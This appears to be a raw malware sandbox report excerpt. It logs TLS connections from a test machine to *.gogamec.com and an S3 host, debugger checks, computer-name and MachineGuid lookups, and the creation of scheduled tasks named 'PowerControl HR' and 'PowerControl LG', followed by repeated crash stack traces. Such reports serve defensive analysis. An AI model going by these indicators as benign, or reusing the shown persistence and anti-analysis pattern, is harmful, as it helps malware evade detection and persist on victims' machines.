TLSv1 192.168.56.103:49304 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49305 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49308 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49224 -> 162.159.133.233:443 C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49317 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49253 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49257 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49269 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49274 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49232 -> 172.67.185.110:443 C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com b0:c4:b1:fe:56:fd:ec:99:f4:dc:0f:3f:36:63:53:f7:6c:3a:26:7b
TLSv1 192.168.56.103:49284 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49286 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49289 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49299 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49301 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49255 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49306 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49261 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49264 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49315 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49275 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49279 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49259 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49280 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49281 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49282 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49291 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49263 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49293 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49295 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49266 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49302 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49307 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49309 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49272 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49321 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49323 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49324 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49277 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49285 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49288 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49294 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49303 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49260 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49265 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49310 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49267 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49276 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49312 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49287 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49296 -> 172.67.204.112:443 C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49313
52.219.66.59:443
C=US, O=Amazon, OU=Server CA 1B, CN=Amazon CN=*.s3.ap-south-1.amazonaws.com c6:36:df:af:09:de:c1:11:cd:93:7d:ef:05:10:32:ae:12:cd:7d:b8
TLSv1
192.168.56.103:49325
172.67.204.112:443
C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1
192.168.56.103:49314
172.67.204.112:443
C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1
192.168.56.103:49326
172.67.204.112:443
C=US, O=Let's Encrypt, CN=R3 CN=*.gogamec.com ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "PowerControl HR" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: SUCCESS: The scheduled task "PowerControl LG" has successfully been created.
console_handle: 0x00000007
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73b34f99
0x387c6ed
0x387c79a
0x387c808
0x37f0a09
0x37f1cba
0x37f1290
0x37f15cd
0x3808939
0x383d9d7
0x383ddeb
0x389f571
0x389f654
ww_testll_0211_single+0x3eb9 @ 0x913eb9
ww_testll_0211_single+0x8eb1 @ 0x918eb1
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x73b334b2
registers.esp: 34726308
registers.edi: 0
registers.eax: 0
registers.ebp: 34726348
registers.edx: 32
registers.ebx: 34726652
registers.esi: 0
registers.ecx: 5939176
1 0 0

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73b34f99
0x387c6ed
0x387c79a
0x387c808
0x37f0a09
0x37f1cba
0x37f129e
0x37f15cd
0x3808939
0x383d9d7
0x383ddeb
0x389f571
0x389f654
ww_testll_0211_single+0x3eb9 @ 0x913eb9
ww_testll_0211_single+0x8eb1 @ 0x918eb1
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x73b334b2
registers.esp: 34726308
registers.edi: 0
registers.eax: 0
registers.ebp: 34726348
registers.edx: 32
registers.ebx: 34726652
registers.esi: 0
registers.ecx: 5939176
1 0 0

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73b34f99
0x387c6ed
0x387c79a
0x387c808
0x37f0a09
0x37f1cba
0x37f1290
0x37f15cd
0x3808939
0x3809831
0x3836065
0x3836d41
0x383dbbe
0x383ddeb
0x389f571
0x389f654
ww_testll_0211_single+0x3eb9 @ 0x913eb9
ww_testll_0211_single+0x8eb1 @ 0x918eb1
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x73b334b2
registers.esp: 34720340
registers.edi: 0
registers.eax: 0
registers.ebp: 34720380
registers.edx: 32
registers.ebx: 34720684
registers.esi: 0
registers.ecx: 5938376
1 0 0

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73b34f99
0x387c6ed
0x387c79a
0x387c808
0x37f0a09
0x37f1cba
0x37f129e
0x37f15cd
0x3808939
0x3809831
0x3836065
0x3836d41
0x383dbbe
0x383ddeb
0x389f571
0x389f654
ww_testll_0211_single+0x3eb9 @ 0x913eb9
ww_testll_0211_single+0x8eb1 @ 0x918eb1
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x73b334b2
registers.esp: 34720340
registers.edi: 0
registers.eax: 0
registers.ebp: 34720380
registers.edx: 32
registers.ebx: 34720684
registers.esi: 0
registers.ecx: 5938376
1 0 0

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73b34f99
0x387c6ed
0x387c79a
0x387c808
0x37f0a09
0x37f1cba
0x37f1290
0x37f15cd
0x3808939
0x3809095
0x3836eb3
0x383dbbe
0x383ddeb
0x389f571
0x389f654
ww_testll_0211_single+0x3eb9 @ 0x913eb9
ww_testll_0211_single+0x8eb1 @ 0x918eb1
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x73b334b2
registers.esp: 34720756
registers.edi: 0
registers.eax: 0
registers.ebp: 34720796
registers.edx: 32
registers.ebx: 34721100
registers.esi: 0
registers.ecx: 5431552
1 0 0

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73b34f99
0x387c6ed
0x387c79a
0x387c808
0x37f0a09
0x37f1cba
0x37f129e
0x37f15cd
0x3808939
0x3809095
0x3836eb3
0x383dbbe
0x383ddeb
0x389f571
0x389f654
ww_testll_0211_single+0x3eb9 @ 0x913eb9
ww_testll_0211_single+0x8eb1 @ 0x918eb1
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x73b334b2
registers.esp: 34720756
registers.edi: 0
registers.eax: 0
registers.ebp: 34720796
registers.edx: 32
registers.ebx: 34721100
registers.esi: 0
registers.ecx: 5431552
1 0 0

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73b34f99
0x387c6ed
0x387c79a
0x387c808
0x37f0a09
0x37f1cba
0x37f1290
0x37f15cd
0x3808939
0x38319c1
0x383b898
0x383dbbe
0x383ddeb
0x389f571
0x389f654
ww_testll_0211_single+0x3eb9 @ 0x913eb9
ww_testll_0211_single+0x8eb1 @ 0x918eb1
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x73b334b2
registers.esp: 34715812
registers.edi: 0
registers.eax: 0
registers.ebp: 34715852
registers.edx: 32
registers.ebx: 34716156
registers.esi: 0
registers.ecx: 6123544
1 0 0

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73b34f99
0x387c6ed
0x387c79a
0x387c808
0x37f0a09
0x37f1cba
0x37f129e
0x37f15cd
0x3808939
0x38319c1
0x383b898
0x383dbbe
0x383ddeb
0x389f571
0x389f654
ww_testll_0211_single+0x3eb9 @ 0x913eb9
ww_testll_0211_single+0x8eb1 @ 0x918eb1
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x73b334b2
registers.esp: 34715812
registers.edi: 0
registers.eax: 0
registers.ebp: 34715852
registers.edx: 32
registers.ebx: 34716156
registers.esi: 0
registers.ecx: 6123544
1 0 0

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73b34f99
0x387c6ed
0x387c79a
0x387c808
0x37f0a09
0x37f1cba
0x37f1290
0x37f15cd
0x3808939
0x3833fe8
0x383b898
0x383dbbe
0x383ddeb
0x389f571
0x389f654
ww_testll_0211_single+0x3eb9 @ 0x913eb9
ww_testll_0211_single+0x8eb1 @ 0x918eb1
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x73b334b2
registers.esp: 34715812
registers.edi: 0
registers.eax: 0
registers.ebp: 34715852
registers.edx: 32
registers.ebx: 34716156
registers.esi: 0
registers.ecx: 6123904
1 0 0

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73b34f99
0x387c6ed
0x387c79a
0x387c808
0x37f0a09
0x37f1cba
0x37f129e
0x37f15cd
0x3808939
0x3833fe8
0x383b898
0x383dbbe
0x383ddeb
0x389f571
0x389f654
ww_testll_0211_single+0x3eb9 @ 0x913eb9
ww_testll_0211_single+0x8eb1 @ 0x918eb1
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x73b334b2
registers.esp: 34715812
registers.edi: 0
registers.eax: 0
registers.ebp: 34715852
registers.edx: 32
registers.ebx: 34716156
registers.esi: 0
registers.ecx: 6123904
1 0 0

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73bb4f99
0x395c6ed
0x395c79a
0x395c808
0x38d0a09
0x38d1cba
0x38d1290
0x38d15cd
0x38e8939
0x391d9d7
0x391ddeb
0x397f571
0x397f654
zz_8wjnwjcywe8dtxxwfai7o+0x2424 @ 0x882424
zz_8wjnwjcywe8dtxxwfai7o+0x4658 @ 0x884658
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x73bb34b2
registers.esp: 35122068
registers.edi: 0
registers.eax: 0
registers.ebp: 35122108
registers.edx: 32
registers.ebx: 35122412
registers.esi: 0
registers.ecx: 12192576
1 0 0

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73bb4f99
0x395c6ed
0x395c79a
0x395c808
0x38d0a09
0x38d1cba
0x38d129e
0x38d15cd
0x38e8939
0x391d9d7
0x391ddeb
0x397f571
0x397f654
zz_8wjnwjcywe8dtxxwfai7o+0x2424 @ 0x882424
zz_8wjnwjcywe8dtxxwfai7o+0x4658 @ 0x884658
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x73bb34b2
registers.esp: 35122068
registers.edi: 0
registers.eax: 0
registers.ebp: 35122108
registers.edx: 32
registers.ebx: 35122412
registers.esi: 0
registers.ecx: 12192576
1 0 0

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73bb4f99
0x395c6ed
0x395c79a
0x395c808
0x38d0a09
0x38d1cba
0x38d1290
0x38d15cd
0x38e8939
0x38e9831
0x3916065
0x3916d41
0x391dbbe
0x391ddeb
0x397f571
0x397f654
zz_8wjnwjcywe8dtxxwfai7o+0x2424 @ 0x882424
zz_8wjnwjcywe8dtxxwfai7o+0x4658 @ 0x884658
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5

